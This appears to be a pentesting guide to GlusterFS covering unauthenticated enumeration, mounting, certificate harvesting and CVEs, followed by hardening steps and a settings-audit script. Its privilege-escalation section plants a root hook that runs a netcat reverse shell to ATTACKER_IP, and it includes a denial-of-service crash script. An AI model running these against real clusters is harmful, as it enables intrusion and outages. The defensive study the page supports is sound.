# 24007-24008-24009-49152 - Pentesting GlusterFS
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**GlusterFS** is a **distributed file system** that aggregates storage from many servers into a **single unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and orchestrates the data-plane bricks, which start at **49152/TCP** (one port per brick, incrementing). Versions before 9.x used **24008-24009/TCP** for brick transport, so you will still see those ports in legacy clusters.
```
PORT STATE SERVICE VERSION
24007/tcp open glusterd GlusterFS (RPC)
49152/tcp open gluster-brick SSL (TLS optional)
```
> Tip: 24007 answers RPC calls even when the storage-only nodes **do not export** any volume, so this service is a reliable target inside large infrastructures.
## Enumeration
Install the client tools on your attack box:
```bash
sudo apt install -y glusterfs-cli glusterfs-client # Debian/Ubuntu
```
1. **Peer discovery & health**
```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```
2. **Volume reconnaissance**
```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```
3. **Mounting without credentials**
```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```
If the mount fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. The common causes are:
* TLS enforcement (`option transport.socket.ssl on`)
* Address-based access control (`option auth.allow <cidr>`)
### Certificate harvesting
Grab the following files from any authorised client node and place them in `/etc/ssl/` (or in the directory named in the error log):
```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```
---
## Known Vulnerabilities (2022-2025)
| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0-10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable over the network | Remote **DoS** and possible RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in the FUSE notify handler | Remote crash via crafted FS operations; a public PoC is available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Improper permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume, leading to the **priv-esc** described below. |
> Always check `gluster --version` **on every node**; mixed clusters are common after partial upgrades.
### Abusing `gluster_shared_storage` (Privilege Escalation)
Even on recent versions, many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. That volume contains cronjob templates that run as **root** on every node.
```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss
# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh
# 3. Wait until glusterd distributes the hook and executes it as root
```
If `hooks/1/` does not exist, look under `/ss_bricks/`; the exact path can differ between major versions.
### Denial-of-Service PoC (CVE-2023-26253)
```python
#!/usr/bin/env python3
# Minimal reproducer: sends a malformed NOTIFY_REPLY XDR frame to 24007
import socket, struct

# xdrlib was removed in Python 3.13; a single XDR unsigned int is just a
# 4-byte big-endian word, so struct produces the same bytes pack_uint did.
payload = struct.pack("!L", 0xdeadbeef)
with socket.create_connection(("10.10.11.131", 24007)) as s:
    # RPC record mark: high bit = last fragment, low 31 bits = fragment length
    s.send(struct.pack("!L", len(payload) | 0x80000000))
    s.send(payload)
```
Running the script crashes `glusterfsd` < 11.0.
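What the frame above sends is a single ONC RPC record: a 4-byte record mark followed by the fragment. A sensor or proxy in front of 24007 can at least drop records that cannot be a well-formed RPC message, which the following added example does (my code, not the PoC author's or the GlusterFS project's). It applies the record-marking and message-header layout from RFC 5531; the program number `EXAMPLE_PROG` is a placeholder, the sample frames are constructed, and the check says nothing about whether a frame actually triggers CVE-2023-26253, only that it fails basic structural validation.

```python
#!/usr/bin/env python3
"""Structural sanity check for ONC RPC records as seen on a glusterd socket.

Added example, not GlusterFS project code. Layout follows RFC 5531:
  record mark : 4 bytes, high bit = last fragment, low 31 bits = length
  CALL body   : xid, msg_type=0, rpcvers=2, prog, vers, proc, cred, verf
  REPLY body  : xid, msg_type=1, reply_stat, verf, accept_stat (MSG_ACCEPTED)
cred and verf are opaque_auth: flavor (4) + length (4) + body, so an
AUTH_NULL one is 8 bytes.
"""
import struct

LAST_FRAGMENT = 0x80000000
MSG_CALL, MSG_REPLY = 0, 1
AUTH_NULL = 0
MIN_CALL_BYTES = 6 * 4 + 8 + 8    # six header words + empty cred + empty verf = 40
MIN_REPLY_BYTES = 3 * 4 + 8 + 4   # xid, msg_type, reply_stat + verf + accept_stat = 24
EXAMPLE_PROG = 0x12345            # placeholder program number, not a real Gluster one


def build_call(xid, prog, vers, proc):
    """Build one well-formed record carrying an AUTH_NULL RPC CALL (test input)."""
    body = struct.pack("!6L", xid, MSG_CALL, 2, prog, vers, proc)
    body += struct.pack("!LL", AUTH_NULL, 0)   # cred: flavor AUTH_NULL, empty body
    body += struct.pack("!LL", AUTH_NULL, 0)   # verf: flavor AUTH_NULL, empty body
    return struct.pack("!L", len(body) | LAST_FRAGMENT) + body


def check_rpc_record(data):
    """Return (ok, reason) for one record (mark + fragment, single last fragment)."""
    if len(data) < 4:
        return False, "truncated record mark"
    (mark,) = struct.unpack("!L", data[:4])
    frag_len = mark & 0x7FFFFFFF
    frag = data[4:]
    if len(frag) != frag_len:
        return False, f"record mark announces {frag_len} bytes but {len(frag)} follow"
    if frag_len < 8:
        return False, "fragment too short for xid and msg_type"
    xid, msg_type = struct.unpack("!LL", frag[:8])
    if msg_type == MSG_CALL:
        if frag_len < MIN_CALL_BYTES:
            return False, f"CALL shorter than minimum {MIN_CALL_BYTES} bytes"
        rpcvers = struct.unpack("!L", frag[8:12])[0]
        if rpcvers != 2:
            return False, f"unsupported rpcvers {rpcvers}"
    elif msg_type == MSG_REPLY:
        if frag_len < MIN_REPLY_BYTES:
            return False, f"REPLY shorter than minimum {MIN_REPLY_BYTES} bytes"
    else:
        return False, f"unknown msg_type {msg_type}"
    return True, "ok"


# Constructed samples: the 4-byte body the PoC above sends, and a valid NULL call.
POC_FRAME = struct.pack("!L", 4 | LAST_FRAGMENT) + struct.pack("!L", 0xDEADBEEF)
GOOD_FRAME = build_call(xid=1, prog=EXAMPLE_PROG, vers=1, proc=0)

if __name__ == "__main__":
    for label, frame in (("poc", POC_FRAME), ("null-call", GOOD_FRAME)):
        print(label, check_rpc_record(frame))
```

The check only handles a record delivered as one last fragment; a real sensor would reassemble multi-fragment records first, and would still need to decode the Gluster program-specific body to go beyond this structural filter.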
---
## Hardening & Detection
* **Update**: the current LTS is 11.1 (July 2025). All of the CVEs above are fixed there.
* Enable **TLS** on every brick:
```bash
gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
```
* Restrict clients with CIDR lists:
```bash
gluster volume set <vol> auth.allow 10.0.0.0/24
```
* Expose the management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch the logs: `tail -f /var/log/glusterfs/glusterd.log`, and enable the **audit-log** feature (`volume set <vol> features.audit-log on`).
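The enumeration section explains why a mount can fail (TLS enforced, `auth.allow` set), and the list above names the settings that should be on. The following added script (my code, not the GlusterFS project's) parses the text printed by `gluster volume info all` and reports volumes missing those settings, so an operator can audit a cluster from the CLI output. It is keyed on the option names this page uses (`transport.socket.ssl`, `auth.allow`, `features.audit-log`); the sample output is constructed, and treating an unset `auth.allow` as wide open is an assumption based on the page's note that unauthenticated mounts succeed on default setups.

```python
#!/usr/bin/env python3
"""Audit `gluster volume info all` output for the weak settings listed above.

Added example, not GlusterFS project code. Reads the CLI text, one volume per
"Volume Name:" block, and flags volumes without TLS, with a permissive
auth.allow, or without the audit log.
"""
import re
import sys

# Constructed sample shaped like `gluster volume info all` output (two volumes).
SAMPLE = """\
Volume Name: data
Type: Replicate
Volume ID: 00000000-0000-0000-0000-000000000001
Status: Started
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: node1:/bricks/data
Brick2: node2:/bricks/data
Options Reconfigured:
transport.socket.ssl: on
auth.allow: 10.0.0.0/24
features.audit-log: on

Volume Name: gluster_shared_storage
Type: Replicate
Volume ID: 00000000-0000-0000-0000-000000000002
Status: Started
Number of Bricks: 1 x 2 = 2
Transport-type: tcp
Bricks:
Brick1: node1:/var/lib/glusterd/ss_brick
Brick2: node2:/var/lib/glusterd/ss_brick
Options Reconfigured:
auth.allow: *
"""


def parse_volume_info(text):
    """Return {volume_name: {"status": str, "options": {key: value}}}."""
    volumes = {}
    current = None
    in_options = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:                      # blank line ends the current volume block
            in_options = False
            continue
        m = re.match(r"Volume Name:\s*(\S+)", line)
        if m:
            current = volumes.setdefault(m.group(1), {"status": "", "options": {}})
            in_options = False
            continue
        if current is None:
            continue
        if line.startswith("Status:"):
            current["status"] = line.split(":", 1)[1].strip()
        elif line == "Options Reconfigured:":
            in_options = True
        elif in_options and ":" in line:  # "key: value" lines under Options Reconfigured
            key, value = line.split(":", 1)
            current["options"][key.strip()] = value.strip()
    return volumes


def audit(volumes):
    """Return {volume_name: [finding, ...]} for volumes with weak settings."""
    findings = {}
    for name, vol in volumes.items():
        opts = vol["options"]
        issues = []
        if opts.get("transport.socket.ssl", "off").lower() != "on":
            issues.append("TLS not enforced (transport.socket.ssl is not 'on')")
        # Assumption: an unset auth.allow behaves like '*' (any client address).
        if opts.get("auth.allow", "*").strip() in ("", "*"):
            issues.append("auth.allow permits any client address")
        if opts.get("features.audit-log", "off").lower() != "on":
            issues.append("audit-log disabled")
        if name == "gluster_shared_storage" and issues:
            issues.append("admin volume gluster_shared_storage exposed with weak settings")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    text = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for name, issues in audit(parse_volume_info(text)).items():
        print(f"[{name}]")
        for issue in issues:
            print("  -", issue)
```

Run it on a live cluster with `gluster volume info all | python3 gluster_audit.py`; with no piped input it audits the embedded sample, where the `data` volume passes and `gluster_shared_storage` is reported.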
---
## References
* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)
* [CVE-2023-26253 PoC github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}